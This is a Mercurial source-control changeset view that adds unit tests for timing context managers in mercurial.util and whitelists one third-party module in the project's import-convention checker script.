util: create a context manager to handle timing...
Martijn Pieters
r38833:8751d1e2 default
@@ -0,0 +1,135 @@
1 # unit tests for mercurial.util utilities
2 from __future__ import absolute_import
3
4 import contextlib
5 import itertools
6 import unittest
7
8 from mercurial import pycompat, util, utils
9
10 @contextlib.contextmanager
11 def mocktimer(incr=0.1, *additional_targets):
12 """Replaces util.timer and additional_targets with a mock
13
14 The timer starts at 0. On each call the time is incremented by the value
15 of incr. If incr is an iterable, then the time is incremented by the
16 next value from that iterable, looping in a cycle when reaching the end.
17
18 additional_targets must be a sequence of (object, attribute_name) tuples;
19 the mock is set with setattr(object, attribute_name, mock).
20
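Illustrative sketch (mirrors how the tests below use this helper):
with incr=1 the mocked timer returns 1, 2, 3, ... on successive calls.

>>> with mocktimer(1):
...     util.timer()
...     util.timer()
1
2
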
21 """
22 time = [0]
23 try:
24 incr = itertools.cycle(incr)
25 except TypeError:
26 incr = itertools.repeat(incr)
27
28 def timer():
29 time[0] += next(incr)
30 return time[0]
31
32 # record original values
33 orig = util.timer
34 additional_origs = [(o, a, getattr(o, a)) for o, a in additional_targets]
35
36 # mock out targets
37 util.timer = timer
38 for obj, attr in additional_targets:
39 setattr(obj, attr, timer)
40
41 try:
42 yield
43 finally:
44 # restore originals
45 util.timer = orig
46 for args in additional_origs:
47 setattr(*args)
48
49 # attr.s default factory for util.timedcmstats.start binds the timer we
50 # need to mock out.
51 _start_default = (util.timedcmstats.start.default, 'factory')
52
53 @contextlib.contextmanager
54 def capturestderr():
55 """Replace utils.procutil.stderr with a pycompat.bytesio instance
56
57 The instance is made available as the return value of __enter__.
58
59 This contextmanager is reentrant.
60
61 """
62 orig = utils.procutil.stderr
63 utils.procutil.stderr = pycompat.bytesio()
64 try:
65 yield utils.procutil.stderr
66 finally:
67 utils.procutil.stderr = orig
68
69 class timedtests(unittest.TestCase):
70 def testtimedcmstatsstr(self):
71 stats = util.timedcmstats()
72 self.assertEqual(str(stats), '<unknown>')
73 stats.elapsed = 12.34
74 self.assertEqual(str(stats), util.timecount(12.34))
75
76 def testtimedcmcleanexit(self):
77 # timestamps 1, 4, elapsed time of 4 - 1 = 3
78 with mocktimer([1, 3], _start_default):
79 with util.timedcm() as stats:
80 # actual context doesn't matter
81 pass
82
83 self.assertEqual(stats.start, 1)
84 self.assertEqual(stats.elapsed, 3)
85 self.assertEqual(stats.level, 1)
86
87 def testtimedcmnested(self):
88 # timestamps 1, 3, 6, 10, elapsed times of 6 - 3 = 3 and 10 - 1 = 9
89 with mocktimer([1, 2, 3, 4], _start_default):
90 with util.timedcm() as outer_stats:
91 with util.timedcm() as inner_stats:
92 # actual context doesn't matter
93 pass
94
95 self.assertEqual(outer_stats.start, 1)
96 self.assertEqual(outer_stats.elapsed, 9)
97 self.assertEqual(outer_stats.level, 1)
98
99 self.assertEqual(inner_stats.start, 3)
100 self.assertEqual(inner_stats.elapsed, 3)
101 self.assertEqual(inner_stats.level, 2)
102
103 def testtimedcmexception(self):
104 # timestamps 1, 4, elapsed time of 4 - 1 = 3
105 with mocktimer([1, 3], _start_default):
106 try:
107 with util.timedcm() as stats:
108 raise ValueError()
109 except ValueError:
110 pass
111
112 self.assertEqual(stats.start, 1)
113 self.assertEqual(stats.elapsed, 3)
114 self.assertEqual(stats.level, 1)
115
116 def testtimeddecorator(self):
117 @util.timed
118 def testfunc(callcount=1):
119 callcount -= 1
120 if callcount:
121 testfunc(callcount)
122
123 # timestamps 1, 2, 3, 4, elapsed times of 3 - 2 = 1 and 4 - 1 = 3
124 with mocktimer(1, _start_default):
125 with capturestderr() as out:
126 testfunc(2)
127
128 self.assertEqual(out.getvalue(), (
129 b' testfunc: 1.000 s\n'
130 b' testfunc: 3.000 s\n'
131 ))
132
133 if __name__ == '__main__':
134 import silenttestrunner
135 silenttestrunner.main(__name__)
@@ -1,781 +1,782 @@
1 1 #!/usr/bin/env python
2 2
3 3 from __future__ import absolute_import, print_function
4 4
5 5 import ast
6 6 import collections
7 7 import os
8 8 import re
9 9 import sys
10 10
11 11 # Import a minimal set of stdlib modules needed for list_stdlib_modules()
12 12 # to work when run from a virtualenv. The modules were chosen empirically
13 13 # so that the return value matches the return value without virtualenv.
14 14 if True: # disable lexical sorting checks
15 15 try:
16 16 import BaseHTTPServer as basehttpserver
17 17 except ImportError:
18 18 basehttpserver = None
19 19 import zlib
20 20
21 21 # Whitelist of modules that symbols can be directly imported from.
22 22 allowsymbolimports = (
23 23 '__future__',
24 24 'bzrlib',
25 25 'hgclient',
26 26 'mercurial',
27 27 'mercurial.hgweb.common',
28 28 'mercurial.hgweb.request',
29 29 'mercurial.i18n',
30 30 'mercurial.node',
31 31 # for cffi modules to re-export pure functions
32 32 'mercurial.pure.base85',
33 33 'mercurial.pure.bdiff',
34 34 'mercurial.pure.mpatch',
35 35 'mercurial.pure.osutil',
36 36 'mercurial.pure.parsers',
37 37 # third-party imports should be directly imported
38 38 'mercurial.thirdparty',
39 'mercurial.thirdparty.attr',
39 40 'mercurial.thirdparty.cbor',
40 41 'mercurial.thirdparty.cbor.cbor2',
41 42 'mercurial.thirdparty.zope',
42 43 'mercurial.thirdparty.zope.interface',
43 44 )
44 45
45 46 # Whitelist of symbols that can be directly imported.
46 47 directsymbols = (
47 48 'demandimport',
48 49 )
49 50
50 51 # Modules that must be aliased because they are commonly confused with
51 52 # common variables and can create aliasing and readability issues.
52 53 requirealias = {
53 54 'ui': 'uimod',
54 55 }
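# For example, under requirealias "from mercurial import ui" must be
# spelled "from mercurial import ui as uimod".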
55 56
56 57 def usingabsolute(root):
57 58 """Whether absolute imports are being used."""
58 59 if sys.version_info[0] >= 3:
59 60 return True
60 61
61 62 for node in ast.walk(root):
62 63 if isinstance(node, ast.ImportFrom):
63 64 if node.module == '__future__':
64 65 for n in node.names:
65 66 if n.name == 'absolute_import':
66 67 return True
67 68
68 69 return False
69 70
70 71 def walklocal(root):
71 72 """Recursively yield all descendant nodes but not in a different scope"""
72 73 todo = collections.deque(ast.iter_child_nodes(root))
73 74 yield root, False
74 75 while todo:
75 76 node = todo.popleft()
76 77 newscope = isinstance(node, ast.FunctionDef)
77 78 if not newscope:
78 79 todo.extend(ast.iter_child_nodes(node))
79 80 yield node, newscope
80 81
81 82 def dotted_name_of_path(path):
82 83 """Given a relative path to a source file, return its dotted module name.
83 84
84 85 >>> dotted_name_of_path('mercurial/error.py')
85 86 'mercurial.error'
86 87 >>> dotted_name_of_path('zlibmodule.so')
87 88 'zlib'
88 89 """
89 90 parts = path.replace(os.sep, '/').split('/')
90 91 parts[-1] = parts[-1].split('.', 1)[0] # remove .py and .so and .ARCH.so
91 92 if parts[-1].endswith('module'):
92 93 parts[-1] = parts[-1][:-6]
93 94 return '.'.join(parts)
94 95
95 96 def fromlocalfunc(modulename, localmods):
96 97 """Get a function to examine which locally defined module the
97 98 target source imports via a specified name.
98 99
99 100 `modulename` is a `dotted_name_of_path()`-ed source file path of
100 101 the target source, which may have `.__init__` at the end of it.
101 102
102 103 `localmods` is a set of absolute `dotted_name_of_path()`-ed source file
103 104 paths of locally defined (= Mercurial specific) modules.
104 105
105 106 This function assumes that module names not existing in
106 107 `localmods` are from the Python standard library.
107 108
108 109 This function returns a function which takes a `name` argument
109 110 and returns an `(absname, dottedpath, hassubmod)` tuple if `name`
110 111 matches a locally defined module. Otherwise, it returns
111 112 False.
112 113
113 114 It is assumed that `name` doesn't have `.__init__`.
114 115
115 116 `absname` is an absolute module name of specified `name`
116 117 (e.g. "hgext.convert"). This can be used to compose prefix for sub
117 118 modules or so.
118 119
119 120 `dottedpath` is a `dotted_name_of_path()`-ed source file path
120 121 (e.g. "hgext.convert.__init__") of `name`. This is used to look
121 122 module up in `localmods` again.
122 123
123 124 `hassubmod` is whether it may have sub modules under it (for
124 125 convenience, even though this is also equivalent to "absname !=
125 126 dottedpath")
126 127
127 128 >>> localmods = {'foo.__init__', 'foo.foo1',
128 129 ... 'foo.bar.__init__', 'foo.bar.bar1',
129 130 ... 'baz.__init__', 'baz.baz1'}
130 131 >>> fromlocal = fromlocalfunc('foo.xxx', localmods)
131 132 >>> # relative
132 133 >>> fromlocal('foo1')
133 134 ('foo.foo1', 'foo.foo1', False)
134 135 >>> fromlocal('bar')
135 136 ('foo.bar', 'foo.bar.__init__', True)
136 137 >>> fromlocal('bar.bar1')
137 138 ('foo.bar.bar1', 'foo.bar.bar1', False)
138 139 >>> # absolute
139 140 >>> fromlocal('baz')
140 141 ('baz', 'baz.__init__', True)
141 142 >>> fromlocal('baz.baz1')
142 143 ('baz.baz1', 'baz.baz1', False)
143 144 >>> # unknown = maybe standard library
144 145 >>> fromlocal('os')
145 146 False
146 147 >>> fromlocal(None, 1)
147 148 ('foo', 'foo.__init__', True)
148 149 >>> fromlocal('foo1', 1)
149 150 ('foo.foo1', 'foo.foo1', False)
150 151 >>> fromlocal2 = fromlocalfunc('foo.xxx.yyy', localmods)
151 152 >>> fromlocal2(None, 2)
152 153 ('foo', 'foo.__init__', True)
153 154 >>> fromlocal2('bar2', 1)
154 155 False
155 156 >>> fromlocal2('bar', 2)
156 157 ('foo.bar', 'foo.bar.__init__', True)
157 158 """
158 159 if not isinstance(modulename, str):
159 160 modulename = modulename.decode('ascii')
160 161 prefix = '.'.join(modulename.split('.')[:-1])
161 162 if prefix:
162 163 prefix += '.'
163 164 def fromlocal(name, level=0):
164 165 # name is a false value when relative imports are used.
165 166 if not name:
166 167 # If relative imports are used, level must be greater than 0.
167 168 assert level > 0
168 169 candidates = ['.'.join(modulename.split('.')[:-level])]
169 170 else:
170 171 if not level:
171 172 # Check relative name first.
172 173 candidates = [prefix + name, name]
173 174 else:
174 175 candidates = ['.'.join(modulename.split('.')[:-level]) +
175 176 '.' + name]
176 177
177 178 for n in candidates:
178 179 if n in localmods:
179 180 return (n, n, False)
180 181 dottedpath = n + '.__init__'
181 182 if dottedpath in localmods:
182 183 return (n, dottedpath, True)
183 184 return False
184 185 return fromlocal
185 186
186 187 def populateextmods(localmods):
187 188 """Populate C extension modules based on pure modules"""
188 189 newlocalmods = set(localmods)
189 190 for n in localmods:
190 191 if n.startswith('mercurial.pure.'):
191 192 m = n[len('mercurial.pure.'):]
192 193 newlocalmods.add('mercurial.cext.' + m)
193 194 newlocalmods.add('mercurial.cffi._' + m)
194 195 return newlocalmods
195 196
196 197 def list_stdlib_modules():
197 198 """List the modules present in the stdlib.
198 199
199 200 >>> py3 = sys.version_info[0] >= 3
200 201 >>> mods = set(list_stdlib_modules())
201 202 >>> 'BaseHTTPServer' in mods or py3
202 203 True
203 204
204 205 os.path isn't really a module, so it's missing:
205 206
206 207 >>> 'os.path' in mods
207 208 False
208 209
209 210 sys requires special treatment, because it's baked into the
210 211 interpreter, but it should still appear:
211 212
212 213 >>> 'sys' in mods
213 214 True
214 215
215 216 >>> 'collections' in mods
216 217 True
217 218
218 219 >>> 'cStringIO' in mods or py3
219 220 True
220 221
221 222 >>> 'cffi' in mods
222 223 True
223 224 """
224 225 for m in sys.builtin_module_names:
225 226 yield m
226 227 # These modules only exist on windows, but we should always
227 228 # consider them stdlib.
228 229 for m in ['msvcrt', '_winreg']:
229 230 yield m
230 231 yield '__builtin__'
231 232 yield 'builtins' # python3 only
232 233 yield 'importlib.abc' # python3 only
233 234 yield 'importlib.machinery' # python3 only
234 235 yield 'importlib.util' # python3 only
235 236 for m in 'fcntl', 'grp', 'pwd', 'termios': # Unix only
236 237 yield m
237 238 for m in 'cPickle', 'datetime': # in Python (not C) on PyPy
238 239 yield m
239 240 for m in ['cffi']:
240 241 yield m
241 242 stdlib_prefixes = {sys.prefix, sys.exec_prefix}
242 243 # We need to supplement the list of prefixes for the search to work
243 244 # when run from within a virtualenv.
244 245 for mod in (basehttpserver, zlib):
245 246 if mod is None:
246 247 continue
247 248 try:
248 249 # Not all module objects have a __file__ attribute.
249 250 filename = mod.__file__
250 251 except AttributeError:
251 252 continue
252 253 dirname = os.path.dirname(filename)
253 254 for prefix in stdlib_prefixes:
254 255 if dirname.startswith(prefix):
255 256 # Then this directory is redundant.
256 257 break
257 258 else:
258 259 stdlib_prefixes.add(dirname)
259 260 for libpath in sys.path:
260 261 # We want to walk everything in sys.path that starts with
261 262 # something in stdlib_prefixes.
262 263 if not any(libpath.startswith(p) for p in stdlib_prefixes):
263 264 continue
264 265 for top, dirs, files in os.walk(libpath):
265 266 for i, d in reversed(list(enumerate(dirs))):
266 267 if (not os.path.exists(os.path.join(top, d, '__init__.py'))
267 268 or top == libpath and d in ('hgdemandimport', 'hgext',
268 269 'mercurial')):
269 270 del dirs[i]
270 271 for name in files:
271 272 if not name.endswith(('.py', '.so', '.pyc', '.pyo', '.pyd')):
272 273 continue
273 274 if name.startswith('__init__.py'):
274 275 full_path = top
275 276 else:
276 277 full_path = os.path.join(top, name)
277 278 rel_path = full_path[len(libpath) + 1:]
278 279 mod = dotted_name_of_path(rel_path)
279 280 yield mod
280 281
281 282 stdlib_modules = set(list_stdlib_modules())
282 283
283 284 def imported_modules(source, modulename, f, localmods, ignore_nested=False):
284 285 """Given the source of a file as a string, yield the names
285 286 imported by that file.
286 287
287 288 Args:
288 289 source: The python source to examine as a string.
289 290 modulename: of specified python source (may have `__init__`)
290 291 localmods: set of locally defined module names (may have `__init__`)
291 292 ignore_nested: If true, import statements that do not start in
292 293 column zero will be ignored.
293 294
294 295 Returns:
295 296 A list of absolute module names imported by the given source.
296 297
297 298 >>> f = 'foo/xxx.py'
298 299 >>> modulename = 'foo.xxx'
299 300 >>> localmods = {'foo.__init__': True,
300 301 ... 'foo.foo1': True, 'foo.foo2': True,
301 302 ... 'foo.bar.__init__': True, 'foo.bar.bar1': True,
302 303 ... 'baz.__init__': True, 'baz.baz1': True }
303 304 >>> # standard library (= not locally defined ones)
304 305 >>> sorted(imported_modules(
305 306 ... 'from stdlib1 import foo, bar; import stdlib2',
306 307 ... modulename, f, localmods))
307 308 []
308 309 >>> # relative importing
309 310 >>> sorted(imported_modules(
310 311 ... 'import foo1; from bar import bar1',
311 312 ... modulename, f, localmods))
312 313 ['foo.bar.bar1', 'foo.foo1']
313 314 >>> sorted(imported_modules(
314 315 ... 'from bar.bar1 import name1, name2, name3',
315 316 ... modulename, f, localmods))
316 317 ['foo.bar.bar1']
317 318 >>> # absolute importing
318 319 >>> sorted(imported_modules(
319 320 ... 'from baz import baz1, name1',
320 321 ... modulename, f, localmods))
321 322 ['baz.__init__', 'baz.baz1']
322 323 >>> # mixed importing, even though it isn't recommended
323 324 >>> sorted(imported_modules(
324 325 ... 'import stdlib, foo1, baz',
325 326 ... modulename, f, localmods))
326 327 ['baz.__init__', 'foo.foo1']
327 328 >>> # ignore_nested
328 329 >>> sorted(imported_modules(
329 330 ... '''import foo
330 331 ... def wat():
331 332 ... import bar
332 333 ... ''', modulename, f, localmods))
333 334 ['foo.__init__', 'foo.bar.__init__']
334 335 >>> sorted(imported_modules(
335 336 ... '''import foo
336 337 ... def wat():
337 338 ... import bar
338 339 ... ''', modulename, f, localmods, ignore_nested=True))
339 340 ['foo.__init__']
340 341 """
341 342 fromlocal = fromlocalfunc(modulename, localmods)
342 343 for node in ast.walk(ast.parse(source, f)):
343 344 if ignore_nested and getattr(node, 'col_offset', 0) > 0:
344 345 continue
345 346 if isinstance(node, ast.Import):
346 347 for n in node.names:
347 348 found = fromlocal(n.name)
348 349 if not found:
349 350 # this should import standard library
350 351 continue
351 352 yield found[1]
352 353 elif isinstance(node, ast.ImportFrom):
353 354 found = fromlocal(node.module, node.level)
354 355 if not found:
355 356 # this should import standard library
356 357 continue
357 358
358 359 absname, dottedpath, hassubmod = found
359 360 if not hassubmod:
360 361 # "dottedpath" is not a package; must be imported
361 362 yield dottedpath
362 363 # examination of "node.names" should be redundant
363 364 # e.g.: from mercurial.node import nullid, nullrev
364 365 continue
365 366
366 367 modnotfound = False
367 368 prefix = absname + '.'
368 369 for n in node.names:
369 370 found = fromlocal(prefix + n.name)
370 371 if not found:
371 372 # this should be a function or a property of "node.module"
372 373 modnotfound = True
373 374 continue
374 375 yield found[1]
375 376 if modnotfound:
376 377 # "dottedpath" is a package, but imported because of non-module
377 378 # lookup
378 379 yield dottedpath
379 380
380 381 def verify_import_convention(module, source, localmods):
381 382 """Verify imports match our established coding convention.
382 383
383 384 We have 2 conventions: legacy and modern. The modern convention is in
384 385 effect when using absolute imports.
385 386
386 387 The legacy convention only looks for mixed imports. The modern convention
387 388 is much more thorough.
388 389 """
389 390 root = ast.parse(source)
390 391 absolute = usingabsolute(root)
391 392
392 393 if absolute:
393 394 return verify_modern_convention(module, root, localmods)
394 395 else:
395 396 return verify_stdlib_on_own_line(root)
396 397
397 398 def verify_modern_convention(module, root, localmods, root_col_offset=0):
398 399 """Verify a file conforms to the modern import convention rules.
399 400
400 401 The rules of the modern convention are:
401 402
402 403 * Ordering is stdlib followed by local imports. Each group is lexically
403 404 sorted.
404 405 * Importing multiple modules via "import X, Y" is not allowed: use
405 406 separate import statements.
406 407 * Importing multiple modules via "from X import ..." is allowed if using
407 408 parenthesis and one entry per line.
408 409 * Only 1 relative import statement per import level ("from .", "from ..")
409 410 is allowed.
410 411 * Relative imports from higher levels must occur before lower levels. e.g.
411 412 "from .." must be before "from .".
412 413 * Imports from peer packages should use relative import (e.g. do not
413 414 "import mercurial.foo" from a "mercurial.*" module).
414 415 * Symbols can only be imported from specific modules (see
415 416 `allowsymbolimports`). For other modules, first import the module then
416 417 assign the symbol to a module-level variable. In addition, these imports
417 418 must be performed before other local imports. This rule only
418 419 applies to import statements outside of any blocks.
419 420 * Relative imports from the standard library are not allowed, unless that
420 421 library is also a local module.
421 422 * Certain modules must be aliased to alternate names to avoid aliasing
422 423 and readability problems. See `requirealias`.
423 424 """
424 425 if not isinstance(module, str):
425 426 module = module.decode('ascii')
426 427 topmodule = module.split('.')[0]
427 428 fromlocal = fromlocalfunc(module, localmods)
428 429
429 430 # Whether a local/non-stdlib import has been performed.
430 431 seenlocal = None
431 432 # Whether a local/non-stdlib, non-symbol import has been seen.
432 433 seennonsymbollocal = False
433 434 # The last name to be imported (for sorting).
434 435 lastname = None
435 436 laststdlib = None
436 437 # Relative import levels encountered so far.
437 438 seenlevels = set()
438 439
439 440 for node, newscope in walklocal(root):
440 441 def msg(fmt, *args):
441 442 return (fmt % args, node.lineno)
442 443 if newscope:
443 444 # Check for local imports in function
444 445 for r in verify_modern_convention(module, node, localmods,
445 446 node.col_offset + 4):
446 447 yield r
447 448 elif isinstance(node, ast.Import):
448 449 # Disallow "import foo, bar" and require separate imports
449 450 # for each module.
450 451 if len(node.names) > 1:
451 452 yield msg('multiple imported names: %s',
452 453 ', '.join(n.name for n in node.names))
453 454
454 455 name = node.names[0].name
455 456 asname = node.names[0].asname
456 457
457 458 stdlib = name in stdlib_modules
458 459
459 460 # Ignore sorting rules on imports inside blocks.
460 461 if node.col_offset == root_col_offset:
461 462 if lastname and name < lastname and laststdlib == stdlib:
462 463 yield msg('imports not lexically sorted: %s < %s',
463 464 name, lastname)
464 465
465 466 lastname = name
466 467 laststdlib = stdlib
467 468
468 469 # stdlib imports should be before local imports.
469 470 if stdlib and seenlocal and node.col_offset == root_col_offset:
470 471 yield msg('stdlib import "%s" follows local import: %s',
471 472 name, seenlocal)
472 473
473 474 if not stdlib:
474 475 seenlocal = name
475 476
476 477 # Import of sibling modules should use relative imports.
477 478 topname = name.split('.')[0]
478 479 if topname == topmodule:
479 480 yield msg('import should be relative: %s', name)
480 481
481 482 if name in requirealias and asname != requirealias[name]:
482 483 yield msg('%s module must be "as" aliased to %s',
483 484 name, requirealias[name])
484 485
485 486 elif isinstance(node, ast.ImportFrom):
486 487 # Resolve the full imported module name.
487 488 if node.level > 0:
488 489 fullname = '.'.join(module.split('.')[:-node.level])
489 490 if node.module:
490 491 fullname += '.%s' % node.module
491 492 else:
492 493 assert node.module
493 494 fullname = node.module
494 495
495 496 topname = fullname.split('.')[0]
496 497 if topname == topmodule:
497 498 yield msg('import should be relative: %s', fullname)
498 499
499 500 # __future__ is special since it needs to come first and use
500 501 # symbol import.
501 502 if fullname != '__future__':
502 503 if not fullname or (
503 504 fullname in stdlib_modules
504 505 and fullname not in localmods
505 506 and fullname + '.__init__' not in localmods):
506 507 yield msg('relative import of stdlib module')
507 508 else:
508 509 seenlocal = fullname
509 510
510 511 # Direct symbol import is only allowed from certain modules and
511 512 # must occur before non-symbol imports.
512 513 found = fromlocal(node.module, node.level)
513 514 if found and found[2]: # node.module is a package
514 515 prefix = found[0] + '.'
515 516 symbols = (n.name for n in node.names
516 517 if not fromlocal(prefix + n.name))
517 518 else:
518 519 symbols = (n.name for n in node.names)
519 520 symbols = [sym for sym in symbols if sym not in directsymbols]
520 521 if node.module and node.col_offset == root_col_offset:
521 522 if symbols and fullname not in allowsymbolimports:
522 523 yield msg('direct symbol import %s from %s',
523 524 ', '.join(symbols), fullname)
524 525
525 526 if symbols and seennonsymbollocal:
526 527 yield msg('symbol import follows non-symbol import: %s',
527 528 fullname)
528 529 if not symbols and fullname not in stdlib_modules:
529 530 seennonsymbollocal = True
530 531
531 532 if not node.module:
532 533 assert node.level
533 534
534 535 # Only allow 1 group per level.
535 536 if (node.level in seenlevels
536 537 and node.col_offset == root_col_offset):
537 538 yield msg('multiple "from %s import" statements',
538 539 '.' * node.level)
539 540
540 541 # Higher-level groups come before lower-level groups.
541 542 if any(node.level > l for l in seenlevels):
542 543 yield msg('higher-level import should come first: %s',
543 544 fullname)
544 545
545 546 seenlevels.add(node.level)
546 547
547 548 # Entries in "from .X import ( ... )" lists must be lexically
548 549 # sorted.
549 550 lastentryname = None
550 551
551 552 for n in node.names:
552 553 if lastentryname and n.name < lastentryname:
553 554 yield msg('imports from %s not lexically sorted: %s < %s',
554 555 fullname, n.name, lastentryname)
555 556
556 557 lastentryname = n.name
557 558
558 559 if n.name in requirealias and n.asname != requirealias[n.name]:
559 560 yield msg('%s from %s must be "as" aliased to %s',
560 561 n.name, fullname, requirealias[n.name])
561 562
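# Illustrative sketch of an import block that satisfies the modern
# convention checked above (module names here are only examples):
#
#     from __future__ import absolute_import
#
#     import os
#     import sys
#
#     from .i18n import _
#     from . import (
#         error,
#         util,
#     )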
562 563 def verify_stdlib_on_own_line(root):
563 564 """Given some python source, verify that stdlib imports are done
564 565 in separate statements from relative local module imports.
565 566
566 567 >>> list(verify_stdlib_on_own_line(ast.parse('import sys, foo')))
567 568 [('mixed imports\\n stdlib: sys\\n relative: foo', 1)]
568 569 >>> list(verify_stdlib_on_own_line(ast.parse('import sys, os')))
569 570 []
570 571 >>> list(verify_stdlib_on_own_line(ast.parse('import foo, bar')))
571 572 []
572 573 """
573 574 for node in ast.walk(root):
574 575 if isinstance(node, ast.Import):
575 576 from_stdlib = {False: [], True: []}
576 577 for n in node.names:
577 578 from_stdlib[n.name in stdlib_modules].append(n.name)
578 579 if from_stdlib[True] and from_stdlib[False]:
579 580 yield ('mixed imports\n stdlib: %s\n relative: %s' %
580 581 (', '.join(sorted(from_stdlib[True])),
581 582 ', '.join(sorted(from_stdlib[False]))), node.lineno)
582 583
583 584 class CircularImport(Exception):
584 585 pass
585 586
586 587 def checkmod(mod, imports):
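"""Breadth-first search for an import cycle through `mod`.

`shortest` records the shortest path length seen per module, so longer
duplicate paths are pruned; a path that leads back to the starting
module raises CircularImport carrying the offending path.
"""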
587 588 shortest = {}
588 589 visit = [[mod]]
589 590 while visit:
590 591 path = visit.pop(0)
591 592 for i in sorted(imports.get(path[-1], [])):
592 593 if len(path) < shortest.get(i, 1000):
593 594 shortest[i] = len(path)
594 595 if i in path:
595 596 if i == path[0]:
596 597 raise CircularImport(path)
597 598 continue
598 599 visit.append(path + [i])
599 600
600 601 def rotatecycle(cycle):
601 602 """arrange a cycle so that the lexicographically first module listed first
602 603
603 604 >>> rotatecycle(['foo', 'bar'])
604 605 ['bar', 'foo', 'bar']
605 606 """
606 607 lowest = min(cycle)
607 608 idx = cycle.index(lowest)
608 609 return cycle[idx:] + cycle[:idx] + [lowest]
609 610
610 611 def find_cycles(imports):
611 612 """Find cycles in an already-loaded import graph.
612 613
613 614 All module names recorded in `imports` should be absolute ones.
614 615
615 616 >>> from __future__ import print_function
616 617 >>> imports = {'top.foo': ['top.bar', 'os.path', 'top.qux'],
617 618 ... 'top.bar': ['top.baz', 'sys'],
618 619 ... 'top.baz': ['top.foo'],
619 620 ... 'top.qux': ['top.foo']}
620 621 >>> print('\\n'.join(sorted(find_cycles(imports))))
621 622 top.bar -> top.baz -> top.foo -> top.bar
622 623 top.foo -> top.qux -> top.foo
623 624 """
624 625 cycles = set()
625 626 for mod in sorted(imports.keys()):
626 627 try:
627 628 checkmod(mod, imports)
628 629 except CircularImport as e:
629 630 cycle = e.args[0]
630 631 cycles.add(" -> ".join(rotatecycle(cycle)))
631 632 return cycles
632 633
633 634 def _cycle_sortkey(c):
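# Sort cycles by length first, ties broken lexicographically.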
634 635 return len(c), c
635 636
636 637 def embedded(f, modname, src):
637 638 """Extract embedded python code
638 639
639 640 >>> def _forcestr(thing):
640 641 ... if not isinstance(thing, str):
641 642 ... return thing.decode('ascii')
642 643 ... return thing
643 644 >>> def test(fn, lines):
644 645 ... for s, m, f, l in embedded(fn, b"example", lines):
645 646 ... print("%s %s %d" % (_forcestr(m), _forcestr(f), l))
646 647 ... print(repr(_forcestr(s)))
647 648 >>> lines = [
648 649 ... b'comment',
649 650 ... b' >>> from __future__ import print_function',
650 651 ... b" >>> ' multiline",
651 652 ... b" ... string'",
652 653 ... b' ',
653 654 ... b'comment',
654 655 ... b' $ cat > foo.py <<EOF',
655 656 ... b' > from __future__ import print_function',
656 657 ... b' > EOF',
657 658 ... ]
658 659 >>> test(b"example.t", lines)
659 660 example[2] doctest.py 2
660 661 "from __future__ import print_function\\n' multiline\\nstring'\\n"
661 662 example[7] foo.py 7
662 663 'from __future__ import print_function\\n'
663 664 """
664 665 inlinepython = 0
665 666 shpython = 0
666 667 script = []
667 668 prefix = 6 # length of the b'  >>> ' / b'  ... ' prompt markers
668 669 t = ''
669 670 n = 0
670 671 for l in src:
671 672 n += 1
672 673 if not l.endswith(b'\n'):
673 674 l += b'\n'
674 675 if l.startswith(b' >>> '): # python inlines
675 676 if shpython:
676 677 print("%s:%d: Parse Error" % (f, n))
677 678 if not inlinepython:
678 679 # We've just entered a Python block.
679 680 inlinepython = n
680 681 t = b'doctest.py'
681 682 script.append(l[prefix:])
682 683 continue
683 684 if l.startswith(b' ... '): # python inlines
684 685 script.append(l[prefix:])
685 686 continue
686 687 cat = re.search(br"\$ \s*cat\s*>\s*(\S+\.py)\s*<<\s*EOF", l)
687 688 if cat:
688 689 if inlinepython:
689 690 yield b''.join(script), (b"%s[%d]" %
690 691 (modname, inlinepython)), t, inlinepython
691 692 script = []
692 693 inlinepython = 0
693 694 shpython = n
694 695 t = cat.group(1)
695 696 continue
696 697 if shpython and l.startswith(b' > '): # sh continuation
697 698 if l == b' > EOF\n':
698 699 yield b''.join(script), (b"%s[%d]" %
699 700 (modname, shpython)), t, shpython
700 701 script = []
701 702 shpython = 0
702 703 else:
703 704 script.append(l[4:])
704 705 continue
705 706 # If we have an empty line or a command for sh, we end the
706 707 # inline script.
707 708 if inlinepython and (l == b' \n'
708 709 or l.startswith(b' $ ')):
709 710 yield b''.join(script), (b"%s[%d]" %
710 711 (modname, inlinepython)), t, inlinepython
711 712 script = []
712 713 inlinepython = 0
713 714 continue
714 715
715 716 def sources(f, modname):
716 717 """Yields possibly multiple sources from a filepath
717 718
718 719 input: filepath, modulename
719 720 yields: script(string), modulename, filepath, linenumber
720 721
721 722 For embedded scripts, the modulename and filepath will be different
722 723 from the function arguments. linenumber is an offset relative to
723 724 the input file.
724 725 """
725 726 py = False
726 727 if not f.endswith('.t'):
727 728 with open(f, 'rb') as src:
728 729 yield src.read(), modname, f, 0
729 730 py = True
730 731 if py or f.endswith('.t'):
731 732 with open(f, 'rb') as src:
732 733 for script, modname, t, line in embedded(f, modname, src):
733 734 yield script, modname, t, line
734 735
735 736 def main(argv):
736 737 if len(argv) < 2 or (argv[1] == '-' and len(argv) > 2):
737 738 print('Usage: %s {-|file [file] [file] ...}' % argv[0])
738 739 return 1
739 740 if argv[1] == '-':
740 741 argv = argv[:1]
741 742 argv.extend(l.rstrip() for l in sys.stdin.readlines())
742 743 localmodpaths = {}
743 744 used_imports = {}
744 745 any_errors = False
745 746 for source_path in argv[1:]:
746 747 modname = dotted_name_of_path(source_path)
747 748 localmodpaths[modname] = source_path
748 749 localmods = populateextmods(localmodpaths)
749 750 for localmodname, source_path in sorted(localmodpaths.items()):
750 751 if not isinstance(localmodname, bytes):
751 752 # This is only safe because all hg's files are ascii
752 753 localmodname = localmodname.encode('ascii')
753 754 for src, modname, name, line in sources(source_path, localmodname):
754 755 try:
755 756 used_imports[modname] = sorted(
756 757 imported_modules(src, modname, name, localmods,
757 758 ignore_nested=True))
758 759 for error, lineno in verify_import_convention(modname, src,
759 760 localmods):
760 761 any_errors = True
761 762 print('%s:%d: %s' % (source_path, lineno + line, error))
762 763 except SyntaxError as e:
763 764 print('%s:%d: SyntaxError: %s' %
764 765 (source_path, e.lineno + line, e))
765 766 cycles = find_cycles(used_imports)
766 767 if cycles:
767 768 firstmods = set()
768 769 for c in sorted(cycles, key=_cycle_sortkey):
769 770 first = c.split()[0]
770 771 # As a rough cut, ignore any cycle that starts with the
771 772 # same module as some other cycle. Otherwise we see lots
772 773 # of cycles that are effectively duplicates.
773 774 if first in firstmods:
774 775 continue
775 776 print('Import cycle:', c)
776 777 firstmods.add(first)
777 778 any_errors = True
778 779 return any_errors != 0
779 780
780 781 if __name__ == '__main__':
781 782 sys.exit(int(main(sys.argv)))
@@ -1,3838 +1,3869 @@
